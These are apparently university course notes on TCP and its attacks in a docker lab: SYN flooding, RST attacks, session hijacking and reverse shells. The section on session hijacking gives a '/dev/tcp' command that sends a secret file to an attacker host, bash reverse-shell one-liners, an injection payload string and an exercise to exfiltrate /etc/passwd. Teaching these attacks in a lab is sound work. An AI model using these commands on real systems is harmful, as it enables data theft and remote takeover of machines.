# TCP Protocol and Attacks

## TCP Protocol
- Transmission Control Protocol (TCP) is a core protocol of TCP-IP suite
- sits on top of IP layer and provides a reliable and ordered communication channel between internet devices
- Most applications: browsers (http, https), SSH, telnet, ftp(s), email use TCP

### TCP Header
![TCP Header](./resources/TCP-Header.png)
- details of the header specification can be found in RFC 793[https://www.ietf.org/rfc/rfc793.txt](https://www.ietf.org/rfc/rfc793.txt)
- Header length (4 bits) - lenght of the TCP header; measured by the number of 32-bit words in the header; multiply by 4 to get the number of octets in the TCP header
- Reserved (6 bits) not used
- SYN, FIN, RST related to connection; will dive into them later
- Window size (16 bits) - used to specifiy the number of octets that the sender of this TCP segment is willing to accept; control congestion so more data is not sent than the buffer can hold
- Checksum (16 bits) - calculated using part of IP and TCP headers and TCP data
- Urgent pointer (16 bits) - if URG bit is set, ther first part of the data contains urgent data that do not "wait in line" in the buffer but directly delivered to the application needing the data
- Options (0-320 bits) - segments can carry a variable length of options

## UDP Protocol
- User Datagram Protol doesn't provie relaibe and ordered communication; lighweight with lower overhead

## TCP Communication Demo using Netcat
- you can use netcat `nc` to create a server and client
- run the `course/demos/TCP_Attack/docker-compose.yml`

```bash
docker compose up -d
```

### Netcat demo

- execute a bash Terminal on `server-10.9.0.5` and run `nc` in listen/server mode

```bash
nc -lnv 9090
```

- execute a bash Terminal on seed-attacker container and run `nc` as a client to connect to the server
```bash
nc 10.9.0.5 9090
```

- start typing some text on terminal and you'll see the text transmitted and printed on the server Terminal

### Python scripts demo
- see `demos/TCP_Attack/` folder for `tcp_server.py` and `tcp_client.py` files
- run server on the victim container and client on the attacker container
- use python3 

### TCP 3-Way Handshake
- 3-way handshake establishes the connection before server and client can start sending and receiving data

![TCP 3-way handshake](./resources/TCPHandShake.png)

- when server receives a SYN packet, it keeps in *SYN Queue*
- at this point, connection is not established yet, so it's called **half-open** connection
    - only client-server is confirmed but not the other way round
- SYN Queue only stores information about the half-open connection
- when server receives ACK packet, the connection is established and server will remove the half-open connection from SYN Queue and move the connection to *ACCEPT Queue*
- When a process calls `accept()`, TCP will de-queue a connection from the *Accept Queue* and pass it to the application

### Retransmission

- if the 3rd ACK packet doesn't arrive, the server will resent its SYN+ACK packet for several times
- if the final ACK packet never arrives, the record stored in *SYN Queue* will timeout (20-60 seconds) and discarded
- number of tries/retransmission depends on a kernel parameter
- we can read the value using the following command
- default is 5

```bash
$ sysctl net.ipv4.tcp_synack_retires
net.ipv4.tcp_synack_retries = 5
```bash

- we can set the value using the following command
```bash
$ sudo sysctl -w net.ipv4.tcp_synack_retries=10
net.ipv4.tcp_synack_retries = 10
```

## Size of the SYN queue
- determines the number of **half-open** connections can be queued
- the number may depend on the size of memory the system has
- use the following commands to see and set SYN queue size

```bash
$ sysctl net.ipv4.tcp_max_syn_backlog
net.ipv4.tcp_max_syn_backlog = 512
$ sudo sysctl -w net.ipv4.tcp_max_syn_backlog=128
net.ipv4.tcp_max_syn_backlog = 128
```

## TCP Syn Flooding Attack

- a type of DoS attack
- **half-open** connection/SYN queue is server's weak point that can be exploited!
- attacker can fill-up the SYN queue with bogus packets
    - continuously send the SYN packets
    - NEVER send the ACK packet and complete the connection
    - attacker uses random source IPs to avoid detection and blocked by IDS/IPS and Firewall

## Launching SYN Flooding Attack

- run the `course/demos/TCP_Attack/docker-compose.yml` file
- goal is to attack server, preventing it from accepting telnet connection from legitimate users
- disable `tcp_syncookies` on the server 
```bash
sysctl -w net.ipv4.tcp_syncookies=0
```
- its already disable on server container and that's the only way to do it in a container
- first do a successful Telnet connection
- check network status for any half-open or established connections

```bash
netstat -tna
netstat -tna | grep -l
```

- run SYN flooding attack and try Telnet again
- execute bash Terminal on attacker machine

```bash
docker exec -it attacker bash
cd volumes
python3 syn_flood.py
```

## Issues with SYN Flooding Attack
### TCP Cache
- on Ubuntu 20.04 and newer, if a node has never made a connection before it will not be able to telnet to victim
- if a machine has made a connection before, server will cache the machine's ip and allow to login even if the SYN queue is full!
- you can see and flush the TCP cache

```bash
ip tcp_metrics show
ip tcp_metrics flush
```

## Countermeasures

- SYN Cookies invented by Daniel J. Bernstein in 1996
- can be conceptualized as HTTP cookie to maintain authentication session
- standard of Linux and FreeBSD
- Server allocate resource only after it receives the first ACK packet
- Server randomly selects a seqence number and some secret key
- Server creates a keyed hashed value (H) using the information from client's IP, port, etc.
- H value is sent as the initial sequence number to the client in SYN+ACK packet
- if client receives H and sends back H+1 as ACK packet, server will establish the connection by recalculating and verifying H using secret and information from the packet
- since attackers do not know the secret, they can't forge a valid cookie

## TCP Reset Attack

- drop the connection between two victim hosts
- TCP connection can be properly closed using TCP FIN packet from either parties and ACKnowledging the packets from both ends
    - analogy is saying good bye and waiting until you hear good bye from other end on celluar devices
- TCP connection can also be closed abruptly using TCP RST packet
    - analogy is hanging up on someone before they may be done talking
- a single TCP RST packet can close the connection!
- attacker spoofs a TCP RST packet either from A to B or B to A to break the connection

### TCP Reset Attack packet

- attacker must somehow recreate a packet that matches either of the victim's packet information
- attacker can guess but bruteforcing may take too long and the connection may already be closed
- attacker can sniff the traffic assuming both victim are in the same LAN network for the sake of demonstration!
    - if the victims are in different networks, attack becomes very difficult if not impossible
- attacker's must know and forge:
1. source IP address
2. destination IP address
3. source port
4. destination port
5. Sequence number (ack number sent by other party)
6. RST bit

### TCP Reset Attack Demo

- run `course/demos/TCP_Attack/docker-compose.yml`
- run `volumes/sniff_telnet.py` from attacker's Terminal
- run telnet from user1 or user2 Terminal
- run `volumes/rst_attack.py` from another attacker's Terminal
    - make sure to change src and dst fields and seq number from `sniff_telenet.py` output

### TCP Reset Attack on SSH connection

- if encryption is done at the Network layer, the entire TCP packet including its header will be encrypted
- it turns out SSH only encrypts at the Transport layer which is above the Network layer
- only the data in TCP packets are encrypted not the header
- same Telnet Reset attack technique works, just change the destination port to 22 (SSH) instead of 23 (Telnet)
- actual demonstration is left as an exercise

### TCP Reset Attack on Video-Streaming Connections

- similar in concept to TCP Telnet Reset attack
- however, as the video is stream it becomes a little challenging to get the sequence number
    - recall, telnet connection waits for command; but streaming continues until streaming is over
- we've to automate the sniff and spoof technique to successfully reset the streaming connection
- let's use `course/demos/TCP_Attack/docker-compose.yml` container setup
- use `firefox` node to watch some YouTube video; YouTube uses TCP
- use attacker machine to run `/volumes/sniff_spoof_rst_attack.py`
- note that the script runs infintely, so it's not a good idea to send the RST packet to server
    - only send RST packet to the machine/client you own
- this seems to be NOT working on modern streaming sites!
    - could be many reasons: too fast; buffering, reconnection by client, etc.


## TCP Session Hijacking Attack

- suppose the attacker missed the opportunity to sniff Telnet username and passwords
- a TCP connection between two hosts can be hijacked by an attacker
- if you can forge and RST the connection, you can forge packets for nefarious purposes
- unencrypted connection can be intercepted and packets can be forged without either party's knowledge
- can send bogus commands on behalf of the client to run on the server


### Some useful NC commands

- start a NC server on the attacker machine
```bash
nc -lnv 9090
```
- run the following command on the server machine
```bash
cat /home/seed/secret.txt > /dev/tcp/<host>/<port>
```
- bash cats the contents and redirects to virutal file
- bash makes a TCP connection to `<host>` at port `<port>`
- `/dev/tcp`, `/dev/udp` are special keywords interpreted by bash
    - Note other shells may not understand these keywords!

### Demo Attack

- use the `demos/TCP_Attack/docker-compose.yml` setup
- server container contains `/home/seed/secret.txt` file with some secret
- attacker container uses `/volumes/sniff_telnet.py` script to sniff Telnet packet
- Note: source and destination port, source and destination IPs and ACK number from most recent packet
    - these info required in session_hijack.py file
- make sure `user1` or `user2` connects to `server` using telnet
- update and run `/volumes/session_hijack.py` to inject command to exfiltrate data


### Exercise
- can you send the contents of server's /etc/passwd file to the attacker?


## Creating Reverse Shell
- instead of running *cat*, we can run a shell program on the server
- instead of using local standard input and output to execute the shell command and see the results, we can use a TCP connection for both input and output of the shell
- such a shell is called *reverse shell**
- **0**, **1**, and **2** are standard input, output and error streams on *nix systems
- redirect the standard output to `/dev/tcp/...` for bash command
- redirect the standard error to standard ouput stream which redirects to `/dev/tcp...`
- use `/dev/tcp...` for the standard input as well 

```bash
/bin/bash -i > /dev/tcp/<host>/<port>
/bin/bash -i > /dev/tcp/<host>/<port> 2>&1
/bin/bash -i > /dev/tcp/<host><port> 2>&1 0<&1
```
- simply change the data to the following to get a reverse shell on the Telnet server
```txt
data = "\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 2>&1 0<&1 \r"
```
- rerun the expirement and see if you get a reverse shell

